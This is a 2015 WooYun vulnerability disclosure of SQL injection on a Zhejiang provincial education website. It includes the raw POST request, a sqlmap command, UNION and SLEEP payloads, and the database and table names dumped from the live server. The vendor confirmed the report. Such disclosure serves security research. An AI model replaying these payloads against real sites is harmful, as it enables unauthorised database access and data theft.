当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105436

漏洞标题:浙江省教育技术中心两处SQL注射漏洞(支持union)

相关厂商:浙江省教育技术中心

漏洞作者: netwind

提交时间:2015-04-03 16:08

修复时间:2015-05-18 22:50

公开时间:2015-05-18 22:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-03: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-13: 细节向核心白帽子及相关领域专家公开
2015-04-23: 细节向普通白帽子公开
2015-05-03: 细节向实习白帽子公开
2015-05-18: 细节向公众公开

简要描述:

浙江省教育技术中心SQL注射漏洞

详细说明:

主站存在注射漏洞:

POST /search_magazine_result.php HTTP/1.1
Content-Length: 218
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.zjedu.org
Cookie: PHPSESSID=ajmr2957k7tv1qm7qcmico1ob2
Host: www.zjedu.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
s_author=*&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0%3f%3f%a8%ba%3f%a8%b2&s_key=e


其中s_author和s_key 都存在注入漏洞

漏洞证明:

将数据包保存为4.txt
注入语句:
sqlmap.py -r d:\4.txt --level 5 --risk 3
检测结果:

Place: (custom) POST
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: s_author=" UNION ALL SELECT CONCAT(0x716b787871,0x6b736e596b5156434656,0x71706b6a71),NULL,NULL,NULL,NULL,NULL,NULL#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: s_author=" AND SLEEP(5)#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---


可泄露数据库:

Place: (custom) POST
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: s_author=" UNION ALL SELECT CONCAT(0x716b787871,0x6b736e596b5156434656,0x71706b6a71),NULL,NULL,NULL,NULL,NULL,NULL#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: s_author=" AND SLEEP(5)#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
available databases [5]:
[*] information_sch<font color="red">e</font>ma
[*] information_schema
[*] t<font color="red">e</font>st
[*] test
[*] zjjyjs


可泄露表名:

Place: (custom) POST
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: s_author=" UNION ALL SELECT CONCAT(0x716b787871,0x6b736e596b5156434656,0x71706b6a71),NULL,NULL,NULL,NULL,NULL,NULL#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: s_author=" AND SLEEP(5)#&s_date=365&s_date_CRtext=1y%a8%a8%a3%a4%a8%b0??%a8%ba?%a8%b2&s_key=e
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
Database: zjjyjs
[67 tables]
+----------------------------------------------------------------------------------------------------------------------+
|
| area_group |
| column_center |
| column_center2 |
| djcolumn_center |
| djinfo_center |
| document_center |
| document_receive |
| document_share |
| fst_area_over |
| fst_areadata |
| fst_ds |
| fst_ds_sb |
| fst_sch |
| fst_schdata |
| fst_schdata_plan |
| fst_schdc_plan |
| fst_tj_plan |
| fst_xs |
| fst_xx |
| info_center |
| info_center2 |
| log_center |
| magazine_cate |
| magazine_center |
| magazine_deliver |
| magazine_stages |
| meeting_center |
| meeting_signup |
| menu_option |
| nycolumn_center |
| nyinfo_center |
| publish_center |
| right_type |
| tv_video_stat |
| user_center |
| user_group |
+----------------------------------------------------------------------------------------------------------------------+


字段名:

1.png

修复方案:

过滤参数

版权声明:转载请注明来源 netwind@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-03 22:49

厂商回复:

非常感谢@netwind和乌云为我们信息安全做的贡献,我们会尽快修复漏洞

最新状态:

暂无